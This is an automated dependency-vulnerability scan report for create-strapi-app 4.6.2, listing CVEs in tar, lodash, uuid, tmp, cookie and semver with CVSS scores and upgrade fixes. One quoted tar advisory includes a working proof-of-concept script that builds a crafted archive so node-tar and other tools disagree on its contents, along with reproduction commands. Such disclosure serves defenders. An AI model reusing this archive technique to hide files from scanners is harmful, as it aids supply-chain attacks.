Vulnerable Library - create-strapi-app-4.6.2.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json,/package.json
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Vulnerabilities
*For some transitive vulnerabilities, there is no version of direct dependency with a fix. Check the "Details" section below to see if there is a version of transitive dependency where vulnerability is fixed.
**In some cases, Remediation PR cannot be created automatically for a vulnerability despite the availability of remediation
Details
CVE-2026-41907
Vulnerable Library - uuid-8.3.2.tgz
RFC4122 (v1, v4, and v5) UUIDs
Library home page: https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
- generate-new-4.6.2.tgz
- ❌ uuid-8.3.2.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
uuid is for the creation of RFC9562 (formerly RFC4122) UUIDs. Prior to 14.0.0, v3, v5, and v6 accept external output buffers but do not reject out-of-range writes (small buf or large offset). This allows silent partial writes into caller-provided buffers. This vulnerability is fixed in 14.0.0.
Publish Date: 2026-04-24
URL: CVE-2026-41907
CVSS 3 Score Details (9.8)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: High
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-w5hq-g745-h8pq
Release Date: 2026-04-24
Fix Resolution: https://github.com/uuidjs/uuid.git - v11.1.1,https://github.com/uuidjs/uuid.git - v13.0.1,https://github.com/uuidjs/uuid.git - v12.0.1
Step up your Open Source Security Game with Mend here
CVE-2026-23950
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
- generate-new-4.6.2.tgz
- ❌ tar-6.1.11.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
node-tar,a Tar for Node.js, has a race condition vulnerability in versions up to and including 7.5.3. This is due to an incomplete handling of Unicode path collisions in the "path-reservations" system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., "ß" and "ss"), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a "PathReservations" system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently. This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using "NFD" Unicode normalization (in which "ß" and "ss" are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which "ß" causes an inode collision with "ss")). This enables an attacker to circumvent internal parallelization locks ("PathReservations") using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates "path-reservations.js" to use a normalization form that matches the target filesystem's behavior (e.g., "NFKD"), followed by first "toLocaleLowerCase('en')" and then "toLocaleUpperCase('en')". As a workaround, users who cannot upgrade promptly, and who are programmatically using "node-tar" to extract arbitrary tarball data should filter out all "SymbolicLink" entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.
Publish Date: 2026-01-20
URL: CVE-2026-23950
CVSS 3 Score Details (8.8)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: Low
- Integrity Impact: High
- Availability Impact: Low
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-r6q2-hw4h-h46w
Release Date: 2026-01-20
Fix Resolution (tar): 7.5.4
Direct dependency fix Resolution (create-strapi-app): 5.36.1
Step up your Open Source Security Game with Mend here
CVE-2026-24842
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
- generate-new-4.6.2.tgz
- ❌ tar-6.1.11.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
node-tar,a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory. Version 7.5.7 contains a fix for the issue.
Publish Date: 2026-01-28
URL: CVE-2026-24842
CVSS 3 Score Details (8.2)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: Low
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Release Date: 2026-01-28
Fix Resolution (tar): 7.5.7
Direct dependency fix Resolution (create-strapi-app): 5.36.1
Step up your Open Source Security Game with Mend here
CVE-2026-4800
Vulnerable Library - lodash-4.17.21.tgz
Lodash modular utilities.
Library home page: https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
- generate-new-4.6.2.tgz
- ❌ lodash-4.17.21.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
Impact:
The fix for CVE-2021-23337 (GHSA-35jh-r3h4-6jhm) added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink.
When an application passes untrusted input as options.imports key names, an attacker can inject default-parameter expressions that execute arbitrary code at template compilation time.
Additionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function().
Patches:
Users should upgrade to version 4.18.0.
Workarounds:
Do not pass untrusted input as key names in options.imports. Only use developer-controlled, static key names.
Publish Date: 2026-03-31
URL: CVE-2026-4800
CVSS 3 Score Details (8.1)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: High
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: High
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-r5fr-rjxr-66jc
Release Date: 2026-03-31
Fix Resolution: lodash-amd - 4.18.0,lodash.template - 4.18.0,lodash-es - 4.18.0,lodash - 4.18.0
Step up your Open Source Security Game with Mend here
CVE-2026-44705
Vulnerable Library - tmp-0.0.33.tgz
Temporary file and directory creator
Library home page: https://registry.npmjs.org/tmp/-/tmp-0.0.33.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json,/package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
- inquirer-8.2.5.tgz
- external-editor-3.1.0.tgz
- ❌ tmp-0.0.33.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
tmp is a temporary file and directory creator for node.js. Prior to 0.2.6, the tmp npm package contains a path traversal vulnerability that allows escaping the intended temporary directory when untrusted data flows into the prefix, postfix, or dir options. By embedding traversal sequences (e.g., ../) or path separators in these parameters, attackers can cause files to be created outside the configured temporary base directory at attacker-controlled locations with the privileges of the running process. This vulnerability affects applications that pass user-controlled data to tmp's file/directory creation functions without proper input sanitization. This vulnerability is fixed in 0.2.6.
Publish Date: 2026-06-11
URL: CVE-2026-44705
CVSS 3 Score Details (7.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: None
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Release Date: 2026-05-27
Fix Resolution: https://github.com/raszi/node-tmp.git - v0.2.6
Step up your Open Source Security Game with Mend here
CVE-2025-13465
Vulnerable Library - lodash-4.17.21.tgz
Lodash modular utilities.
Library home page: https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
- generate-new-4.6.2.tgz
- ❌ lodash-4.17.21.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
Lodash versions 4.0.0 through 4.17.22 are vulnerable to prototype pollution in the _.unset and _.omit functions. An attacker can pass crafted paths which cause Lodash to delete methods from global prototypes.
The issue permits deletion of properties but does not allow overwriting their original behavior.
This issue is patched on 4.17.23
Publish Date: 2026-01-21
URL: CVE-2025-13465
CVSS 3 Score Details (7.2)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: Low
- Availability Impact: Low
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-xxjr-mmjv-4gpg
Release Date: 2026-01-21
Fix Resolution: lodash-amd - 4.17.23,lodash - 4.17.23,lodash-es - 4.17.23
Step up your Open Source Security Game with Mend here
CVE-2026-31802
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
- generate-new-4.6.2.tgz
- ❌ tar-6.1.11.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
node-tar is a full-featured Tar for Node.js. Prior to version 7.5.11, tar (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as C:../../../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This vulnerability is fixed in 7.5.11.
Publish Date: 2026-03-09
URL: CVE-2026-31802
CVSS 3 Score Details (7.1)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Local
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: High
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Release Date: 2026-03-09
Fix Resolution: https://github.com/isaacs/node-tar.git - v7.5.11
Step up your Open Source Security Game with Mend here
CVE-2026-29786
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
- generate-new-4.6.2.tgz
- ❌ tar-6.1.11.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, tar can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This issue has been patched in version 7.5.10.
Publish Date: 2026-03-07
URL: CVE-2026-29786
CVSS 3 Score Details (7.1)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Local
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: High
- Availability Impact: Low
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Release Date: 2026-03-07
Fix Resolution: https://github.com/isaacs/node-tar.git - v7.5.10
Step up your Open Source Security Game with Mend here
CVE-2026-26960
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
- generate-new-4.6.2.tgz
- ❌ tar-6.1.11.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
node-tar is a full-featured Tar for Node.js. When using default options in versions 7.5.7 and below, an attacker-controlled archive can create a hardlink inside the extraction directory that points to a file outside the extraction root, enabling arbitrary file read and write as the extracting user. Severity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive. This issue has been fixed in version 7.5.8.
Publish Date: 2026-02-20
URL: CVE-2026-26960
CVSS 3 Score Details (7.1)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Local
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Release Date: 2026-02-18
Fix Resolution (tar): 7.5.8
Direct dependency fix Resolution (create-strapi-app): 5.37.0
Step up your Open Source Security Game with Mend here
CVE-2026-23745
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
- generate-new-4.6.2.tgz
- ❌ tar-6.1.11.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
node-tar is a Tar for Node.js. The node-tar library (<= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets. This vulnerability is fixed in 7.5.3.
Publish Date: 2026-01-16
URL: CVE-2026-23745
CVSS 3 Score Details (7.1)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Local
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: Low
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Release Date: 2026-01-16
Fix Resolution: https://github.com/isaacs/node-tar.git - v7.5.3
Step up your Open Source Security Game with Mend here
CVE-2026-2950
Vulnerable Library - lodash-4.17.21.tgz
Lodash modular utilities.
Library home page: https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
- generate-new-4.6.2.tgz
- ❌ lodash-4.17.21.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
Impact:
Lodash versions 4.17.23 and earlier are vulnerable to prototype pollution in the _.unset and _.omit functions. The fix for (CVE-2025-13465: GHSA-xxjr-mmjv-4gpg) only guards against string key members, so an attacker can bypass the check by passing array-wrapped path segments. This allows deletion of properties from built-in prototypes such as Object.prototype, Number.prototype, and String.prototype.
The issue permits deletion of prototype properties but does not allow overwriting their original behavior.
Patches:
This issue is patched in 4.18.0.
Workarounds:
None. Upgrade to the patched version.
Publish Date: 2026-03-31
URL: CVE-2026-2950
CVSS 3 Score Details (6.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: Low
- Availability Impact: Low
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-xxjr-mmjv-4gpg
Release Date: 2026-03-31
Fix Resolution (lodash): 4.17.23
Direct dependency fix Resolution (create-strapi-app): 5.37.0
Step up your Open Source Security Game with Mend here
CVE-2024-28863
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
- generate-new-4.6.2.tgz
- ❌ tar-6.1.11.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
node-tar is a Tar for Node.js. node-tar prior to version 6.2.1 has no limit on the number of sub-folders created in the folder creation process. An attacker who generates a large number of sub-folders can consume memory on the system running node-tar and even crash the Node.js client within few seconds of running it using a path with too many sub-folders inside. Version 6.2.1 fixes this issue by preventing extraction in excessively deep sub-folders.
Publish Date: 2024-03-21
URL: CVE-2024-28863
CVSS 3 Score Details (6.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: None
- Availability Impact: High
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-f5x3-32g6-xq36
Release Date: 2024-03-21
Fix Resolution: tar - 6.2.1
Step up your Open Source Security Game with Mend here
CVE-2026-53655
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
- generate-new-4.6.2.tgz
- ❌ tar-6.1.11.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
Summary "tar" (node-tar) applies a PAX extended header's "size=" record (and other PAX overrides) to the next header entry of any type, including intermediary metadata headers such as a GNU long-name ("L") or long-link ("K") entry. Per POSIX pax, a PAX extended header ("x") describes the next file entry, not the intermediary extension headers that may sit between the "x" header and the file it annotates. Because node-tar lets the PAX "size" override the byte length of an intervening "L"/"K"/"x" header, an attacker can desynchronize node-tar's stream cursor relative to every other mainstream tar implementation (GNU tar, libarchive/bsdtar, Python "tarfile", and the now-fixed "tar-rs" / "astral-tokio-tar"). The result is a tar parser interpretation differential (CWE-436): a single crafted archive yields a different set of members under node-tar than under the reference tar tools. An attacker can use this to hide a member from one parser while it is visible to another, which defeats security tooling whose scanner and extractor disagree on archive contents (e.g. a malware/secret scanner that lists entries with one library while a downstream step extracts with another). node-tar is one of the most widely deployed JavaScript tar libraries (it backs "npm"'s own package-tarball handling and is a transitive dependency of a very large fraction of the npm ecosystem), so the blast radius for "files that extract differently depending on the tool" is broad. This is the same root cause and fix that was just addressed upstream in the Rust tar ecosystem ("tar-rs" / "astral-tokio-tar"); node-tar carries the equivalent defect and has no equivalent guard. Impact - CWE-436 Interpretation Conflict / inconsistent tar parsing (the same class as the prior tar "smuggling" advisories GHSA-j5gw-2vrg-8fgx and GHSA-fp55-jw48-c537). - A crafted archive can present one logical member list to a tool that lists or scans with node-tar and a different member list to GNU tar / libarchive / Python tarfile (and vice versa). This lets a malicious file be hidden from a scanner that uses a different parser than the eventual extractor, or hidden from node-tar-based inspection while still landing on disk via a system "tar". - No authentication is required; the only precondition is that a victim parses an attacker-supplied tar with node-tar. Tar archives are routinely fetched from untrusted sources (package registries, user uploads, CI artifacts, container layers). - Severity: Medium. Impact is integrity-of-archive-interpretation, not direct RCE; it is a building block for supply-chain / scanner-evasion attacks rather than a standalone code-execution primitive. Vulnerable code (file:line) "src/header.ts" (compiled to "dist/esm/header.js:49" and "dist/commonjs/header.js:85" in the published "tar@7.5.15"): // Header.decode(buf, off, ex, gex) this.size = ex?.size ?? gex?.size ?? decNumber(buf, off + 124, 12) "ex" is the currently-accumulated PAX local extended header and "gex" the PAX global header. The "size" override from "ex"/"gex" is applied unconditionally to whatever header is being decoded next — there is no check that the header being decoded is a real file entry rather than an intermediary extension header. "src/parse.ts", "[CONSUMEHEADER]" constructs the next header with the current "EX"/"GEX" applied: const header = new Header(chunk, position, this[EX], this[GEX]) and later branches on whether that header is a metadata entry. "this[EX]" is cleared only in the non-meta (real file) branch: if (entry.meta) { // L / K / x / g metadata entries: this[EX] is left intact here if (entry.size > this.maxMetaEntrySize) { entry.ignore = true this[STATE] = 'ignore' entry.resume() } else if (entry.size > 0) { this[META] = '' entry.on('data', c => (this[META] += c)) this[STATE] = 'meta' } } else { this[EX] = undefined // EX cleared only once a real file entry is reached } When the stream is ordered "x (PAX, size=N) -> L (GNU long-name) -> file", the "L" header is constructed with "this[EX]" still set, so its "size"/"remain" becomes "N" instead of the "L" payload's true length. node-tar then consumes "N" bytes of "metadata" and resumes header parsing at the wrong offset, landing mid-stream. Every other mainstream parser applies the PAX "size" only to the following file entry, so they stay synchronized. The correct behavior (and the fix shipped upstream in the Rust tar ecosystem) is to not apply PAX "size"/overrides when the entry being decoded is itself an extension header ("L" GNU long-name, "K" GNU long-link, "x" PAX local, "g" PAX global). How input reaches the sink "tar.list()", "tar.extract()"/"tar.x()", and "tar.Parse"/"tar.Unpack" all route every 512-byte header block through "Header.decode(...)" with the currently-accumulated "EX"/"GEX". Any consumer that parses an attacker-supplied archive — "tar.list", "tar.extract", or piping into the streaming "Parser" — reaches the sink. No options need to be enabled; the default code path is affected. Proof of concept Archive layout (all standard, GNU-tar-producible blocks): block 0 : x header (PAX local extended, typeflag 'x'), its own size = len(pax body) block 1 : x payload : the single PAX record "...size=2048\n" block 2 : L header (GNU long-name '././@LongLink'), real size = 13 block 3 : L payload : "longname.txt\0" (the long name for the next file) block 4 : file header 'file_a', size = 16 block 5 : file_a body (16 bytes, zero-padded to 512) block 6 : file header 'file_b', size = 16 block 7 : file_b body (16 bytes, zero-padded to 512) Generator ("make_tar.py", pure stdlib, no external deps): def hdr(name, size, typeflag): h = bytearray(512); name = name[:100]; h[0:len(name)] = name h[100:108] = b'0000644\0'; h[108:116] = b'0000000\0'; h[116:124] = b'0000000\0' h[124:136] = ('%011o\0' % size).encode(); h[136:148] = b'00000000000\0' h[156:157] = typeflag; h[257:263] = b'ustar\0'; h[263:265] = b'00' h[148:156] = b' ' * 8 cs = sum(h); h[148:156] = ('%06o\0 ' % cs).encode() return bytes(h) def pad(d): return d + b'\0' * ((512 - len(d) % 512) % 512) def pax_record(key, val): # length-prefixed PAX record "LEN key=val\n" body = b' %s=%s\n' % (key.encode(), str(val).encode()); n = len(body) while True: s = str(n).encode() + body if len(s) == n: break n = len(s) return s pax = pax_record('size', 2048) # malicious: claim size=2048 for the "next" entry out = hdr(b'PaxHeaders/x', len(pax), b'x') + pad(pax) out += hdr(b'././@LongLink', 13, b'L') + pad(b'longname.txt\0') out += hdr(b'file_a', 16, b'0') + pad(b'AAAA_file_a_body') out += hdr(b'file_b', 16, b'0') + pad(b'BBBB_file_b_body') out += b'\0' * 1024 open('pax-desync.tar', 'wb').write(out) A negative-control archive is identical except the PAX record is "pax_record('comment', 'x')" (no "size="), written to "pax-control.tar". End-to-end reproduction (against pinned version "tar@7.5.15", latest release) Install the published package into a clean project and parse both archives: $ npm init -y >/dev/null && npm install tar@7.5.15 $ node -e "console.log(require('tar/package.json').version)" 7.5.15 $ grep -n "ex?.size ?? gex?.size" node_modules/tar/dist/esm/header.js 49: this.size = ex?.size ?? gex?.size ?? decNumber(buf, off + 124, 12); "e2e.mjs": import * as tar from 'tar' async function listEntries(f){ const got=[], warns=[] await tar.list({ file:f, onReadEntry:e=>{ got.push({path:e.path,size:e.size,type:e.type}); e.resume() }, onwarn:(code,_msg)=>warns.push(code) }) return { got, warns } } const mal = await listEntries('pax-desync.tar') console.log('MALICIOUS entries :', JSON.stringify(mal.got), 'warnings:', JSON.stringify(mal.warns)) const ctl = await listEntries('pax-control.tar') console.log('CONTROL entries :', JSON.stringify(ctl.got), 'warnings:', JSON.stringify(ctl.warns)) Verbatim output: === Deployed-consumer E2E: npm tar@7.5.15 (latest release) === [MALICIOUS] archive = x(PAX size=2048) -> L(GNU longname "longname.txt") -> file_a(16B) -> file_b(16B) tar.list() entries : [] tar.list() warnings: ["TAR_ENTRY_INVALID"] [NEGATIVE CONTROL] same archive, PAX record is "comment=x" (no size= override) tar.list() entries : [{"path":"longname.txt","size":16,"type":"File"},{"path":"file_b","size":16,"type":"File"}] tar.list() warnings: [] Reference parsers on the same "pax-desync.tar": $ tar tvf pax-desync.tar -rw-r--r-- 0 0 0 2048 Jan 1 1970 longname.txt # GNU tar $ bsdtar tvf pax-desync.tar -rw-r--r-- 0 0 0 2048 Jan 1 1970 longname.txt # libarchive $ python3 -c "import tarfile; print([m.name for m in tarfile.open('pax-desync.tar').getmembers()])" ['longname.txt'] # Python tarfile Interpretation differential: GNU tar, libarchive (bsdtar), and Python "tarfile" all extract the member "longname.txt" from "pax-desync.tar", whereas node-tar "7.5.15" desynchronizes, raises "TAR_ENTRY_INVALID" (checksum failure from landing mid-stream), and reports zero members. The negative control proves the divergence is caused solely by the PAX "size=" override being applied to the intermediary "L" header — when the same archive carries a PAX record without "size=", node-tar parses it identically to the reference tools ("longname.txt", "file_b"). Suggested fix When decoding a header, do not apply PAX "size" (or other PAX overrides) if the header being decoded is itself an extension header. Concretely, in "src/parse.ts" clear/ignore "this[EX]" (and "this[GEX]" for "size") when the header's type is "ExtendedHeader", "GlobalExtendedHeader", "NextFileHasLongPath" (GNU "L"), or "NextFileHasLongLinkpath" (GNU "K"); equivalently, in "Header.decode", gate the "ex?.size ?? gex?.size" override on the decoded type not being one of those extension types. This mirrors the upstream Rust fix, which guards "pax_size" with "is_gnu_longname || is_gnu_longlink || is_pax_local_extensions || is_pax_global_extensions". A fix PR is being prepared against a private fork and will be linked here. Fix PR To be linked from a private fork of the repository (the fix will not be pushed to any public fork or to upstream during embargo). Credits Reported by tonghuaroot.
Publish Date: 2026-06-15
URL: CVE-2026-53655
CVSS 3 Score Details (6.2)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Local
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: High
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-vmf3-w455-68vh
Release Date: 2026-06-15
Fix Resolution: tar - 7.5.16
Step up your Open Source Security Game with Mend here
CVE-2024-47764
Vulnerable Library - cookie-0.4.2.tgz
HTTP server cookie parsing and serialization
Library home page: https://registry.npmjs.org/cookie/-/cookie-0.4.2.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json,/package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
- generate-new-4.6.2.tgz
- node-6.19.7.tgz
- ❌ cookie-0.4.2.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
cookie is a basic HTTP cookie parser and serializer for HTTP servers. The cookie name could be used to set other fields of the cookie, resulting in an unexpected cookie value. A similar escape can be used for path and domain, which could be abused to alter other fields of the cookie. Upgrade to 0.7.0, which updates the validation for name, path, and domain.
Publish Date: 2024-10-04
URL: CVE-2024-47764
CVSS 3 Score Details (5.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: Low
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-pxg6-pf52-xh8x
Release Date: 2024-10-04
Fix Resolution (cookie): 0.7.0
Direct dependency fix Resolution (create-strapi-app): 5.0.0
Step up your Open Source Security Game with Mend here
CVE-2022-25883
Vulnerable Library - semver-7.3.8.tgz
The semantic version parser used by npm.
Library home page: https://registry.npmjs.org/semver/-/semver-7.3.8.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- create-strapi-app-4.6.2.tgz (Root Library)
- generate-new-4.6.2.tgz
- ❌ semver-7.3.8.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.
Mend Note: The description of this vulnerability differs from MITRE.
Publish Date: 2023-06-21
URL: CVE-2022-25883
CVSS 3 Score Details (5.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: None
- Availability Impact: Low
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-c2qf-rxjj-qqgw
Release Date: 2023-06-21
Fix Resolution (semver): 7.5.2
Direct dependency fix Resolution (create-strapi-app): 4.12.0
Step up your Open Source Security Game with Mend here
CVE-2025-54798
Vulnerable Library - tmp-0.0.33.tgz
Temporary file and directory creator
Library home page: https://registry.npmjs.org/tmp/-/tmp-0.0.33.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json,/package.json
Dependency Hierarchy:
